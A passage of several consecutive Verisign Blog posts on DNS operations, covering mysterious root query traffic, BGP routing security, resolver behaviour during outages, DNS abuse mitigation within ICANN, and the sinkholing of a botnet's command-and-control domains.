However, in this traffic we see queries for .com domain names from AS 15169 at the rate of about 30 million per day. (See Fig. 4) It is well known that Google Public DNS has thousands of backend servers and limits TTLs to a maximum of six hours. Assuming 4,000 backend servers each cached a .com referral for six hours, we might expect about 16,000 queries over a 24-hour period. The observed count is about 2,000 times higher by this back-of-the-envelope calculation.
From our initial analysis, it was unclear if these queries represented legitimate end-user activity, though we were confident that source IP address spoofing was not involved. However, since the query names shared some similarities to those used by botnets, we could not rule out malicious activity.
These findings were presented last year at the DNS-OARC 35a virtual meeting. In the conference chat room after the talk, the missing piece of this puzzle was mentioned by a conference participant. There is a Google webpage describing its public DNS service that talks about prepending nonce (i.e., random) labels for cache misses to increase entropy. In what came to be known as “the Kaminsky Attack,” an attacker can cause a recursive name server to emit queries for names chosen by the attacker. Prepending a nonce label adds unpredictability to the queries, making it very difficult to spoof a response. Note, however, that nonce prepending only works for queries where the reply is a referral.
In addition, Google DNS has implemented a form of query name minimization (see RFC 7816 and RFC 9156). As such, if a user requests the IP address of www.example.com and Google DNS decides this warrants a query to a root name server, it takes the name, strips all labels except for the TLD and then prepends a nonce string, resulting in something like u5vmt7xanb6rf.com. A root server’s response to that query is identical to one using the original query name.
Now, we are able to explain nearly all of the mysterious aspects of this query traffic from Google. We see random second-level labels because of the nonce strings that are designed to prevent spoofing. The 12- and 13-character-long labels are most likely the result of converting a 64-bit random value into an unpadded ASCII label with encoding similar to Base32. We don’t observe the same queries at TLD name servers because of both the nonce prepending and query name minimization. The query type is always NS because of query name minimization.
With that said, there’s still one aspect that eludes explanation: the high query rate (2000x for .com) and apparent lack of caching. And so, this aspect of the mystery continues.
Even though we haven’t fully closed the books on this case, one thing is certain: without the community’s teamwork to put the pieces of the puzzle together, explanations for this strange traffic may have remained unknown today. The case of the mysterious DNS root query traffic is a perfect example of the collaboration that’s required to navigate today’s ever-changing cyber environment. We’re grateful and humbled to be part of such a dedicated community that is intent on ensuring the security, stability and resiliency of the internet, and we look forward to more productive teamwork in the future.
The post More Mysterious DNS Root Query Traffic from a Large Cloud/DNS Operator appeared first on Verisign Blog.
The Domain Name System has provided the fundamental service of mapping internet names to addresses from almost the earliest days of the internet’s history. Billions of internet-connected devices use DNS continuously to look up Internet Protocol addresses of the named resources they want to connect to — for instance, a website such as blog.verisign.com. Once a device has the resource’s address, it can then communicate with the resource using the internet’s routing system.
Just as ensuring that DNS is secure, stable and resilient is a priority for Verisign, so is making sure that the routing system has these characteristics. Indeed, DNS itself depends on the internet’s routing system for its communications, so routing security is vital to DNS security too.
To better understand how these challenges can be met, it’s helpful to step back and remember what the internet is: a loosely interconnected network of networks that interact with each other at a multitude of locations, often across regions or countries.
Packets of data are transmitted within and between those networks, which utilize a collection of technical standards and rules called the IP suite. Every device that connects to the internet is uniquely identified by its IP address, which can take the form of either a 32-bit IPv4 address or a 128-bit IPv6 address. Similarly, every network that connects to the internet has an Autonomous System Number, which is used by routing protocols to identify the network within the global routing system.
The primary job of the routing system is to let networks know the available paths through the internet to specific destinations. Today, the system largely relies on a decentralized and implicit trust model — a hallmark of the internet’s design. No centralized authority dictates how or where networks interconnect globally, or which networks are authorized to assert reachability for an internet destination. Instead, networks share knowledge with each other about the available paths from devices to destination: They route “by rumor.”
Under the Border Gateway Protocol, the internet’s de-facto inter-domain routing protocol, local routing policies decide where and how internet traffic flows, but each network independently applies its own policies on what actions it takes, if any, with data that connects through its network.
BGP has scaled well over the past three decades because 1) it operates in a distributed manner, 2) it has no central point of control (nor failure), and 3) each network acts autonomously. While networks may base their routing policies on an array of pricing, performance and security characteristics, ultimately BGP can use any available path to reach a destination. Often, the choice of route may depend upon personal decisions by network administrators, as well as informal assessments of technical and even individual reliability.
Two prominent types of operational and security incidents occur in the routing system today: route hijacks and route leaks. Route hijacks reroute internet traffic to an unintended destination, while route leaks propagate routing information to an unintended audience. Both types of incidents can be accidental as well as malicious.
Preventing route hijacks and route leaks requires considerable coordination in the internet community, a concept that fundamentally goes against the BGP’s design tenets of distributed action and autonomous operations. A key characteristic of BGP is that any network can potentially announce reachability for any IP addresses to the entire world. That means that any network can potentially have a detrimental effect on the global reachability of any internet destination.
Fortunately, there is a solution already receiving considerable deployment momentum, the Resource Public Key Infrastructure. RPKI provides an internet number resource certification infrastructure, analogous to the traditional PKI for websites. RPKI enables number resource allocation authorities and networks to specify Route Origin Authorizations that are cryptographically verifiable. ROAs can then be used by relying parties to confirm the routing information shared with them is from the authorized origin.
RPKI is standards-based and appears to be gaining traction in improving BGP security. But it also brings new challenges.
Specifically, RPKI creates new external and third-party dependencies that, as adoption continues, ultimately replace the traditionally autonomous operation of the routing system with a more centralized model. If too tightly coupled to the routing system, these dependencies may impact the robustness and resilience of the internet itself. Also, because RPKI relies on DNS and DNS depends on the routing system, network operators need to be careful not to introduce tightly coupled circular dependencies.
Regional Internet Registries, the organizations responsible for top-level number resource allocation, can potentially have direct operational implications on the routing system. Unlike DNS, the global RPKI as deployed does not have a single root of trust. Instead, it has multiple trust anchors, one operated by each of the RIRs. RPKI therefore brings significant new security, stability and resiliency requirements to RIRs, updating their traditional role of simply allocating ASNs and IP addresses with new operational requirements for ensuring the availability, confidentiality, integrity, and stability of this number resource certification infrastructure.
As part of improving BGP security and encouraging adoption of RPKI, the routing community started the Mutually Agreed Norms for Routing Security initiative in 2014. Supported by the Internet Society, MANRS aims to reduce the most common routing system vulnerabilities by creating a culture of collective responsibility towards the security, stability and resiliency of the global routing system. MANRS is continuing to gain traction, guiding internet operators on what they can do to make the routing system more reliable.
Routing by rumor has served the internet well, and a decade ago it may have been ideal because it avoided systemic dependencies. However, the increasingly critical role of the internet and the evolving cyberthreat landscape require a better approach for protecting routing information and preventing route leaks and route hijacks. As network operators deploy RPKI with security, stability and resiliency, the billions of internet-connected devices that use DNS to look up IP addresses can then communicate with those resources through networks that not only share routing information with one another as they’ve traditionally done, but also do something more. They’ll make sure that the routing information they share and use is secure — and route without rumor.
The post Routing Without Rumor: Securing the Internet’s Routing System appeared first on Verisign Blog.
When an outage affects a component of the internet infrastructure, there can often be downstream ripple effects affecting other components or services, either directly or indirectly. We would like to share our observations of this impact in the case of two recent such outages, measured at various levels of the DNS hierarchy, and discuss the resultant increase in query volume due to the behavior of recursive resolvers.
During the beginning of October 2021, the internet saw two significant outages, affecting Facebook’s services and the .club top level domain, both of which did not properly resolve for a period of time. Throughout these outages, Verisign and other DNS operators reported significant increases in query volume. We provided consistent responses throughout, with the correct delegation data pointing to the correct nameservers.
While these higher query rates do not impact Verisign’s ability to respond, they raise a broader operational question – whether the repeated nature of these queries, indicative of a lack of negative caching, might potentially be mistaken for a denial-of-service attack.
On Oct. 4, 2021, Facebook experienced a widespread outage, lasting nearly six hours. During this time most of its systems were unreachable, including those that provide Facebook’s DNS service. The outage impacted facebook.com, instagram.com, whatsapp.net and other domain names.
Under normal conditions, the .com and .net authoritative name servers answer about 7,000 queries per second in total for the three domain names previously mentioned. During this particular outage, however, query rates for these domain names reached upwards of 900,000 queries per second (an increase of more than 100x), as shown in Figure 1 below.
Figure 1: Rate of DNS queries for Facebook’s domain names during the 10/4/21 outage.
During this outage, recursive name servers received no response from Facebook’s name servers – instead, those queries timed out. In situations such as this, recursive name servers generally return a SERVFAIL or “server failure” response, presented to end users as a “this site can’t be reached” error.
Figure 1 shows an increasing query rate over the duration of the outage. Facebook uses relatively low Time-to-Lives (TTLs), a setting that tells DNS resolvers how long to cache an answer on their DNS records before issuing a new query, of from one to five minutes. This in turn means that, five minutes into the outage, all relevant records would have expired from all recursive resolver caches – or at least from those that honor the publisher’s TTLs. It is not immediately clear why the query rate continues to climb throughout the outage, nor whether it would eventually have plateaued had the outage continued.
To get a sense of where the traffic comes from, we group query sources by their autonomous system number. The top five autonomous systems, along with all others grouped together, are shown in Figure 2.
Figure 2: Rate of DNS queries for Facebook’s domain names grouped by source autonomous system.
From Figure 2 we can see that, at their peak, queries for these domain names to Verisign’s .com and .net authoritative name servers from the most active recursive resolvers – those of Google and Cloudflare – increased around 7,000x and 2,000x respectively over their average non-outage rates.
On Oct. 7th, 2021, three days after Facebook’s outage, the .club and .hsbc TLDs also experienced a three-hour outage. In this case, the relevant authoritative servers remained reachable, but responded with SERVFAIL messages. The effect on recursive resolvers was essentially the same: Since they did not receive useful data, they repeatedly retried their queries to the parent zone. During the incident, the Verisign-operated A-root and J-root servers observed an increase in queries for .club domain names of 45x, from 80 queries per second before, to 3,700 queries per second during the outage.
Figure 3: Rate of DNS queries to A and J root servers during the 10/7/2021 .club outage.
Similar to the previous example, this outage also demonstrated an increasing trend in query rate during the duration of the outage. In this case, it might be explained by the fact that the records for .club’s delegation in the root zone use two-day TTLs. However, the theoretical analysis is complicated by the fact that authoritative name server records in child zones use longer TTLs (six days), while authoritative name server address records use shorter TTLs (10 minutes). Here we do not observe a significant amount of query traffic from Google sources; instead, the increased query volume is largely attributable to the long tail of recursive resolvers in “All Others.”
Figure 4: Rate of DNS queries for .club and .hsbc, grouped by source autonomous system.
Earlier this year Verisign implemented a botnet sinkhole and analyzed the received traffic. This botnet utilizes more than 1,500 second-level domain names, likely for command and control. We observed queries from approximately 50,000 clients every day. As an experiment, we configured our sinkhole name servers to return SERVFAIL and REFUSED responses for two of the botnet domain names.
When configured to return a valid answer, each domain name’s query rate peaks at about 50 queries per second. However, when configured to return SERVFAIL, the query rate for a single domain name increases to 60,000 per second, as shown in Figure 5. Further, the query rate for the botnet domain name also increases at the TLD and root name servers, even though those services are functioning normally and data relevant to the botnet domain name has not changed – just as with the two outages described above. Figure 6 shows data from the same experiment (although for a different date), colored by the source autonomous system. Here, we can see that approximately half of the increased query traffic is generated by one organization’s recursive resolvers.
Figure 5: Query rates to name servers for one domain name experimentally configured to return SERVFAIL.
Figure 6: Query rates to botnet sinkhole name servers, grouped by autonomous system, when one domain name is experimentally configured to return SERVFAIL.
These two outages and one experiment all demonstrate that recursive name servers can become unnecessarily aggressive when responses to queries are not received due to connectivity issues, timeouts, or misconfigurations.
In each of these three cases, we observe significant query rate increases from recursive resolvers across the internet – with particular contributors, such as Google Public DNS and Cloudflare’s resolver, identified on each occasion.
Often in cases like this we turn to internet standards for guidance. RFC 2308 is a 1998 Standards Track specification that describes negative caching of DNS queries. The RFC covers name errors (e.g., NXDOMAIN), no data, server failures, and timeouts. Unfortunately, it states that negative caching for server failures and timeouts is optional. We have submitted an Internet-Draft that proposes updating RFC 2308 to require negative caching for DNS resolution failures.
We believe it is important for the security, stability and resiliency of the internet’s DNS infrastructure that the implementers of recursive resolvers and public DNS services carefully consider how their systems behave in circumstances where none of a domain name’s authoritative name servers are providing responses, yet the parent zones are providing proper referrals. We feel it is difficult to rationalize the patterns that we are currently observing, such as hundreds of queries per second from individual recursive resolver sources. The global DNS would be better served by more appropriate rate limiting, and algorithms such as exponential backoff, to address these types of cases we’ve highlighted here. Verisign remains committed to leading and contributing to the continued security, stability and resiliency of the DNS for all global internet users.
This piece was co-authored by Verisign Fellow Duane Wessels and Verisign Distinguished Engineers Matt Thomas and Yannis Labrou.
The post Observations on Resolver Behavior During DNS Outages appeared first on Verisign Blog.
Today, we released the latest issue of The Domain Name Industry Brief, which shows that the third quarter of 2021 closed with 364.6 million domain name registrations across all top-level domains, a decrease of 2.7 million domain name registrations, or 0.7%, compared to the second quarter of 2021.1,2 Domain name registrations have decreased by 6.1 million, or 1.6%, year over year.1,2
Check out the latest issue of The Domain Name Industry Brief to see domain name stats from the third quarter of 2021, including:
The Domain Name Industry Brief this quarter also includes an overview of the ongoing community work to mitigate DNS security threats.
To see past issues of The Domain Name Industry Brief, please visit verisign.com/dnibarchives.
The post Verisign Q3 2021 The Domain Name Industry Brief: 364.6 Million Domain Name Registrations in the Third Quarter of 2021 appeared first on Verisign Blog.
For over a decade, the Internet Corporation for Assigned Names and Numbers (ICANN) and its multi-stakeholder community have engaged in an extended dialogue on the topic of DNS abuse, and the need to define, measure and mitigate DNS-related security threats. With increasing global reliance on the internet and DNS for communication, connectivity and commerce, the members of this community have important parts to play in identifying, reporting and mitigating illegal or harmful behavior, within their respective roles and capabilities.
As we consider the path forward on necessary and appropriate steps to improve mitigation of DNS abuse, it’s helpful to reflect briefly on the origins of this issue within ICANN, and to recognize the various and relevant community inputs to our ongoing work.
As a starting point, it’s important to understand ICANN’s central role in preserving the security, stability, resiliency and global interoperability of the internet’s unique identifier system, and also the limitations established within ICANN’s bylaws. ICANN’s primary mission is to ensure the stable and secure operation of the internet’s unique identifier systems, but as expressly stated in its bylaws, ICANN “shall not regulate (i.e., impose rules and restrictions on) services that use the internet’s unique identifiers or the content that such services carry or provide, outside the express scope of Section 1.1(a).” As such, ICANN’s role is important, but limited, when considering the full range of possible definitions of “DNS Abuse,” and developing a comprehensive understanding of security threat categories and the roles and responsibilities of various players in the internet infrastructure ecosystem is required.
In support of this important work, ICANN’s generic top-level domain (gTLD) contracted parties (registries and registrars) continue to engage with ICANN, and with other stakeholders and community interest groups, to address key factors related to effective and appropriate DNS security threat mitigation, including:
To better understand the various roles, responsibilities and processes, it’s important to first define illegal and abusive online activity. While perspectives may vary across our wide range of interest groups, the emerging consensus on definitions and terminology is that these activities can be categorized as DNS Security Threats, Infrastructure Abuse, Illegal Content, or Abusive Content, with ICANN’s remit generally limited to the first two categories.
Behavior within each of these categories constitutes abuse, and it is incumbent on members of the community to actively work to combat and mitigate these behaviors where they have the capability, expertise and responsibility to do so. We recognize the benefit of coordination with other entities, including ICANN within its bylaw-mandated remit, across their respective areas of responsibility.
The ICANN Organization has been actively involved in advancing work on DNS abuse, including the 2017 initiation of the Domain Abuse Activity Reporting (DAAR) system by the Office of the Chief Technology Officer. DAAR is a system for studying and reporting on domain name registration and security threats across top-level domain (TLD) registries, with an overarching purpose to develop a robust, reliable, and reproducible methodology for analyzing security threat activity, which the ICANN community may use to make informed policy decisions. The first DAAR reports were issued in January 2018 and they are updated monthly. Also in 2017, ICANN published its “Framework for Registry Operators to Address Security Threats,” which provides helpful guidance to registries seeking to improve their own DNS security posture.
The ICANN Organization also plays an important role in enforcing gTLD contract compliance and implementing policies developed by the community via its bottom-up, multi-stakeholder processes. For example, over the last several years, it has conducted registry and registrar audits of the anti-abuse provisions in the relevant agreements.
The ICANN Organization has also been a catalyst for increased community attention and action on DNS abuse, including initiating the DNS Security Facilitation Initiative Technical Study Group, which was formed to investigate mechanisms to strengthen collaboration and communication on security and stability issues related to the DNS. Over the last two years, there have also been multiple ICANN cross-community meeting sessions dedicated to the topic, including the most recent session hosted by the ICANN Board during its Annual General Meeting in October 2021. Also, in 2021, ICANN formalized its work on DNS abuse into a dedicated program within the ICANN Organization. These enforcement and compliance responsibilities are very important to ensure that all of ICANN’s contracted parties are living up to their obligations, and that any so-called “bad actors” are identified and remediated or de-accredited and removed from serving the gTLD registry or registrar markets.
The ICANN Organization continues to develop new initiatives to help mitigate DNS security threats, including: (1) expanding DAAR to integrate some country code TLDs, and to eventually include registrar-level reporting; (2) work on COVID domain names; (3) contributions to the development of a Domain Generating Algorithms Framework and facilitating waivers to allow registries and registrars to act on imminent security threats, including botnets at scale; and (4) plans for the ICANN Board to establish a DNS abuse caucus.
As early as 2009, the ICANN community began to identify the need for additional safeguards to help address DNS abuse and security threats, and those community inputs increased over time and have reached a crescendo over the last two years. In the early stages of this community dialogue, the ICANN Governmental Advisory Committee, via its Public Safety Working Group, identified the need for additional mechanisms to address “criminal activity in the registration of domain names.” In the context of renegotiation of the Registrar Accreditation Agreement between ICANN and accredited registrars, and the development of the New gTLD Base Registry Agreement, the GAC played an important and influential role in highlighting this need, providing formal advice to the ICANN Board, which resulted in new requirements for gTLD registry and registrar operators, and new contractual compliance requirements for ICANN.
Following the launch of the 2012 round of new gTLDs, and the finalization of the 2013 amendments to the RAA, several ICANN bylaw-mandated review teams engaged further on the issue of DNS Abuse. These included the Competition, Consumer Trust and Consumer Choice Review Team (CCT-RT), and the second Security, Stability and Resiliency Review Team (SSR2-RT). Both final reports identified and reinforced the need for additional tools to help measure and combat DNS abuse. Also, during this timeframe, the GAC, along with the At-Large Advisory Committee and the Security and Stability Advisory Committee, issued their own respective communiques and formal advice to the ICANN Board reiterating or reinforcing past statements, and providing support for recommendations in the various Review Team reports. Most recently, the SSAC issued SAC 115 titled “SSAC Report on an Interoperable Approach to Addressing Abuse Handling in the DNS.” These ICANN community group inputs have been instrumental in bringing additional focus and/or clarity to the topic of DNS abuse, and have encouraged ICANN and its gTLD registries and registrars to look for improved mechanisms to address the types of abuse within our respective remits.
During 2020 and 2021, ICANN’s gTLD contracted parties have been constructively engaged with other parts of the ICANN community, and with ICANN Org, to advance improved understanding on the topic of DNS security threats, and to identify new and improved mechanisms to enhance the security, stability and resiliency of the domain name registration and resolution systems. Collectively, the registries and registrars have engaged with nearly all groups represented in the ICANN community, and we have produced important documents related to DNS abuse definitions, registry actions, registrar abuse reporting, domain generating algorithms, and trusted notifiers. These all represent significant steps forward in framing the context of the roles, responsibilities and capabilities of ICANN’s gTLD contracted parties, and, consistent with our Letter of Intent commitments, Verisign has been an important contributor, along with our partners, in these Contracted Party House initiatives.
In addition, the gTLD contracted parties and ICANN Organization continue to engage constructively on a number of fronts, including upcoming work on standardized registry reporting, which will help result in better data on abuse mitigation practices that will help to inform community work, future reviews, and provide better visibility into the DNS security landscape.
It is important to note that groups outside of ICANN’s immediate multi-stakeholder community have contributed significantly to the topic of DNS abuse mitigation:
Internet & Jurisdiction Policy Network
The Internet & Jurisdiction Policy Network is a multi-stakeholder organization addressing the tension between the cross-border internet and national jurisdictions. Its secretariat facilitates a global policy process engaging over 400 key entities from governments, the world’s largest internet companies, technical operators, civil society groups, academia and international organizations from over 70 countries. The I&JP has been instrumental in developing multi-stakeholder inputs on issues such as trusted notifier, and Verisign has been a long-time contributor to that work since the I&JP’s founding in 2012.
DNS Abuse Institute
The DNS Abuse Institute was formed in 2021 to develop “outcomes-based initiatives that will create recommended practices, foster collaboration and develop industry-shared solutions to combat the five areas of DNS Abuse: malware, botnets, phishing, pharming, and related spam.” The Institute was created by Public Interest Registry, the registry operator for the .org TLD.
Global Cyber Alliance
The Global Cyber Alliance is a nonprofit organization dedicated to making the internet a safer place by reducing cyber risk. The GCA builds programs, tools and partnerships to sustain a trustworthy internet to enable social and economic progress for all.
ECO “topDNS” DNS Abuse Initiative
Eco is the largest association of the internet industry in Europe. Eco is a long-standing advocate of an “Internet with Responsibility” and of self-regulatory approaches, such as the DNS Abuse Framework. The eco “topDNS” initiative will help bring together stakeholders with an interest in combating and mitigating DNS security threats, and Verisign is a supporter of this new effort.
Other Community Groups
Verisign contributes to the anti-abuse, technical and policy communities: We continuously engage with ICANN and an array of other industry partners to help ensure the continued safe and secure operation of the DNS. For example, Verisign is actively engaged in anti-abuse, technical and policy communities such as the Anti-Phishing and Messaging, Malware and Mobile Anti-Abuse Working Groups, FIRST and the Internet Engineering Task Force.
As a leader in the domain name industry and DNS ecosystem, Verisign supports and has contributed to the cross-community efforts enumerated above. In addition, Verisign also engages directly by:
An important concept and approach for mitigating illegal and abusive activity online is the ability to engage with and rely upon third-party “trusted notifiers” to identify and report such incidents at the appropriate level in the DNS ecosystem. Verisign has supported and been engaged in the good work of the Internet & Jurisdiction Policy Network since its inception, and we’re encouraged by its recent progress on trusted notifier framing. As mentioned earlier, there are some key questions to be addressed as we consider the viability of engaging trusted notifiers or building trusting notifier entities, to help mitigate illegal and abusive online activity.
Verisign’s recent experience with the U.S. government (NTIA and FDA) in combating illegal online opioid sales has been very helpful in illuminating a possible approach for third-party trusted notifier engagement. As noted, we have also benefited from direct engagement with the Internet Watch Foundation and law enforcement in combating CSAM. These recent examples of third-party engagement have underscored the value of a well-formed and executed notification regime, supported by clear expectations, due diligence and due process.
Discussions around trusted notifiers and an appropriate framework for engagement are under way, and Verisign recently engaged with other registries and registrars to lead the development of such a framework for further discussion within the ICANN community. We have significant expertise and experience as an infrastructure provider within our areas of technical, legal and contractual responsibility, and we are aggressive in protecting our operations from bad actors. But in matters related to illegal or abusive content, we need and value contributions from third parties to appropriately identify such behavior when supported by necessary evidence and due diligence. Precisely how such third-party notifications can be formalized and supported at scale is an open question, but one that requires further exploration and work. Verisign is committed to continuing to contribute to these ongoing discussions as we work to mitigate illegal and abusive threats to the security, stability and resiliency of the internet.
Over the last several years, DNS abuse and DNS-related security threat mitigation has been a very important topic of discussion in and around the ICANN community. In cooperation with ICANN, contracted parties, and other groups within the ICANN community, the DNS ecosystem including Verisign has been constructively engaged in developing a common understanding and practical work to advance these efforts, with a goal of meaningfully reducing the level and impact of malicious activity in the DNS. In addition to its contractual compliance functions, ICANN’s contributions have been important in helping to advance this important work and it continues to have a critical coordination and facilitation function that brings the ICANN community together on this important topic. The ICANN community’s recent focus on DNS abuse has been helpful, significant progress has been made, and more work is needed to ensure continued progress in mitigating DNS security threats. As we look ahead to 2022, we are committed to collaborating constructively with ICANN and the ICANN community to deliver on these important goals.
The post Ongoing Community Work to Mitigate Domain Name System Security Threats appeared first on Verisign Blog.
The global internet, from the perspective of its billions of users, has often been envisioned as a cloud — a shapeless structure that connects users to applications and to one another, with the internal details left up to the infrastructure operators inside.
From the perspective of the infrastructure operators, however, the global internet is a network of networks. It’s a complex set of connections among network operators, application platforms, content providers and other parties.
And just as the total amount of global internet traffic continues to grow, so too does the shape and structure of the internet — the internal details of the cloud — continue to evolve.
At the Association for Computing Machinery’s Special Interest Group on Data Communications (ACM SIGCOMM) conference in 2010, researchers at Arbor Networks and the University of Michigan, including Danny McPherson, now executive vice president and chief security officer at Verisign, published one of the first papers to analyze the internal structure of the internet in detail.
The study, entitled “Internet Inter-Domain Traffic,” drew from two years of measurements involving more than 200 exabytes of data.
One of the paper’s key observations was the emergence of a “global internet core” of a relatively small number of large application and content providers that had become responsible for the majority of the traffic between different parts of the internet — in contrast to the previous topology where large network operators were the primary source.
The authors’ conclusion: “we expect the trend towards internet inter-domain traffic consolidation to continue and even accelerate.”
The paper’s predictions of internet traffic and topology trends proved out over the past decade, as confirmed by one of the paper’s authors, Craig Labovitz, in a 2019 presentation that reiterated the paper’s main findings: the internet is “getting bigger by traffic volume” while also “rapidly getting smaller by concentration of content sources.”
This week, the ACM SIGCOMM 2021 conference series recognized the enduring value of the research with the prestigious Test of Time Paper Award, given to a paper that “deemed to be an outstanding paper whose contents are still a vibrant and useful contribution today.”
Internet measurement research is particularly relevant to Domain Name System (DNS) operators such as Verisign. To optimize the deployment of their services, DNS operators need to know where DNS query traffic is most likely to be exchanged in the coming years. Insights into the internal structure of the internet can help DNS operators ensure the ongoing security, stability and resiliency of their services, for the benefit both of other infrastructure operators who depend on DNS, and the billions of users who connect online every day.
Congratulations to Danny and co-authors Craig Labovitz, Scott Iekel-Johnson, Jon Oberheide and Farnam Jahanian on receiving this award, and thanks to ACM SIGCOMM for its recognition of the research. If you’re curious about what evolutionary developments Danny and others at Verisign are envisioning today about the internet of the future, subscribe to the Verisign blog, and follow us on Twitter and LinkedIn.
The post The Test of Time at Internet Scale: Verisign’s Danny McPherson Recognized with ACM SIGCOMM Award appeared first on Verisign Blog.
Note: This article originally appeared in Verisign’s Q1 2021 Domain Name Industry Brief.
This article expands on observations of a botnet traffic group at various levels of the Domain Name System (DNS) hierarchy, presented at DNS-OARC 35.
Addressing DNS abuse and maintaining a healthy DNS ecosystem are important components of Verisign’s commitment to being a responsible steward of the internet. We continuously engage with the Internet Corporation for Assigned Names and Numbers (ICANN) and other industry partners to help ensure the secure, stable and resilient operation of the DNS.
Based on recent telemetry data from Verisign’s authoritative top-level domain (TLD) name servers, Verisign observed a widespread botnet responsible for a disproportionate amount of total global DNS queries – and, in coordination with several registrars, registries and ICANN, acted expeditiously to remediate it.
Just prior to Verisign taking action to remediate the botnet, upwards of 27.5 billion queries per day were being sent to Verisign’s authoritative TLD name servers, accounting for roughly 10% of Verisign’s total DNS traffic. That amount of query volume in most DNS environments would be considered a sustained distributed denial-of-service (DDoS) attack.
These queries were associated with a particular piece of malware that emerged in 2018, spreading throughout the internet to create a global botnet infrastructure. Botnets provide a substrate for malicious actors to theoretically perform all manner of malicious activity – executing DDoS attacks, exfiltrating data, sending spam, conducting phishing campaigns or even installing ransomware. This is the result of the malware’s ability to download and execute any other type of payload the malicious actor desires.
Malware authors often apply various forms of evasion techniques to protect their botnets from being detected and remediated. A Domain Generation Algorithm (DGA) is an example of such an evasion technique.
DGAs are seen in various families of malware that periodically generate a number of domain names, which can be used as rendezvous points for botnet command-and-control servers. By using a DGA to build the list of domain names, the malicious actor makes it more difficult for security practitioners to identify what domain names will be used and when. Only by exhaustively reverse-engineering a piece of malware can the definitive set of domain names be ascertained.
The choices made by miscreants to tailor malware DGAs directly influences the DGAs’ ability to evade detection. For instance, electing to use more TLDs and a large number of domain names in a given time period makes the malware’s operation more difficult to disrupt; however, this approach also increases the amount of network noise, making it easier to identify anomalous traffic patterns by security and network teams. Likewise, a DGA that uses a limited number of TLDs and domain names will generate significantly less network noise but is more fragile and susceptible to remediation.
Botnets that implement DGA algorithms or utilize domain names clearly represent an “abuse of the DNS,” opposed to other types of abuse that are executed “via the DNS,” such as phishing. This is an important distinction the DNS community should consider as it continues to refine the scope of DNS abuse and how remediation of the various abuses can be effectuated.
The remediation of domain names used by botnets as rendezvous points poses numerous operational challenges and insights. The set of domain names needs to be identified and investigated to determine their current registration status. Risk assessments must be evaluated on registered domain names to determine if additional actions should be performed, such as sending registrar notifications, issuing requests to transfer domain names, adding Extensible Provisioning Protocol (EPP) hold statuses, altering delegation records, etc. There are also timing and coordination elements that must be balanced with external entities, such as ICANN, law enforcement, Computer Emergency Readiness Teams (CERTs) and contracted parties, including registrars and registries. Other technical decisions also need to be considered, designed and deployed to achieve the desired remediation goal.
After coordinating with ICANN, and several registrars and registries, Verisign registered the remaining available botnet domain names and began a three-phase plan to sinkhole those domain names. Ultimately, this remediation effort would reduce the traffic sent to Verisign authoritative name servers and effectively eliminate the botnet’s ability to use command-and-control domain names within Verisign-operated TLDs.
Figure 1 below shows the amount of botnet traffic Verisign authoritative name servers received prior to intervention, and throughout the process of registering, delegating and sinkholing the botnet domain names.
Phase one was executed on Dec. 21, 2020, in which 100 .cc domain names were configured to resolve to Verisign-operated sinkhole servers. Subsequently, traffic at Verisign authoritative name servers quickly decreased. The second group of domain names contained 500 .com and .net domain names, which were sinkholed on Jan. 7, 2021. Again, traffic volume at Verisign authoritative name servers quickly decreased. The final group of 879 .com and .net domain names were sinkholed on Jan. 13, 2021. By the end of phase three, the cumulative DNS traffic reduction surpassed 25 billion queries per day. Verisign reserved approximately 10 percent of the botnet domain names to remain on serverHold as a placebo/control-group to better understand sinkholing effects as they relate to query volume at the child and parent zones. Verisign believes that sinkholing the remaining domain names would further reduce authoritative name server traffic by an additional one billion queries.
This botnet highlights the remarkable Pareto-like distribution of DNS query traffic, in which a few thousand domain names that span namespaces containing more than 165 million domain names, demand a vastly disproportionate amount of DNS resources.
What causes the amplification of DNS traffic volume for non-existent domain names to occur at the upper levels of the DNS hierarchy? Verisign is conducting a variety of measurements on the sinkholed botnet domain names to better understand the caching behavior of the resolver population. We are observing some interesting traffic changes at the TLD and root name servers when time to live (TTL) and response codes are altered at the sinkhole servers. Stay tuned.
In addition to remediating this botnet in late 2020 and into early 2021, Verisign extended its already four-year endeavor to combat the Avalanche botnet family. Since 2016, the Avalanche botnet had been significantly impacted due to actions taken by Verisign and an international consortium of law enforcement, academic and private organizations. However, many of the underlying Avalanche-compromised machines are still not remediated, and the threat from Avalanche could increase again if additional actions are not taken. To prevent this from happening, Verisign, in coordination with ICANN and other industry partners, is using a variety of tools to ensure Avalanche command-and-control domain names cannot be used in Verisign-operated TLDs.
Botnets are a persistent issue. And as long as they exist as a threat to the security, stability and resiliency of the DNS, cross-industry coordination and collaboration will continue to lie at the core of combating them.
This piece was co-authored by Matt Thomas and Duane Wessels, distinguished engineers at Verisign.
The post Industry Insights: Verisign, ICANN and Industry Partners Collaborate to Combat Botnets appeared first on Verisign Blog.
This is the final in a multi-part series on cryptography and the Domain Name System (DNS).
In previous posts in this series, I’ve discussed a number of applications of cryptography to the DNS, many of them related to the Domain Name System Security Extensions (DNSSEC).
In this final blog post, I’ll turn attention to another application that may appear at first to be the most natural, though as it turns out, may not always be the most necessary: DNS encryption. (I’ve also written about DNS encryption as well as minimization in a separate post on DNS information protection.)
In 2014, the Internet Engineering Task Force (IETF) chartered the DNS PRIVate Exchange (dprive) working group to start work on encrypting DNS queries and responses exchanged between clients and resolvers.
That work resulted in RFC 7858, published in 2016, which describes how to run the DNS protocol over the Transport Layer Security (TLS) protocol, also known as DNS over TLS, or DoT.
DNS encryption between clients and resolvers has since gained further momentum, with multiple browsers and resolvers supporting DNS over Hypertext Transport Protocol Security (HTTPS), or DoH, with the formation of the Encrypted DNS Deployment Initiative, and with further enhancements such as oblivious DoH.
The dprive working group turned its attention to the resolver-to-authoritative exchange during its rechartering in 2018. And in October of last year, ICANN’s Office of the CTO published its strategy recommendations for the ICANN-managed Root Server (IMRS, i.e., the L-Root Server), an effort motivated in part by concern about potential “confidentiality attacks” on the resolver-to-root connection.
From a cryptographer’s perspective the prospect of adding encryption to the DNS protocol is naturally quite interesting. But this perspective isn’t the only one that matters, as I’ve observed numerous times in previous posts.
A common theme in this series on cryptography and the DNS has been the question of whether the benefits of a technology are sufficient to justify its cost and complexity.
This question came up not only in my review of two newer cryptographic advances, but also in my remarks on the motivation for two established tools for providing evidence that a domain name doesn’t exist.
Recall that the two tools — the Next Secure (NSEC) and Next Secure 3 (NSEC3) records — were developed because a simpler approach didn’t have an acceptable risk / benefit tradeoff. In the simpler approach, to provide a relying party assurance that a domain name doesn’t exist, a name server would return a response, signed with its private key, “<name> doesn’t exist.”
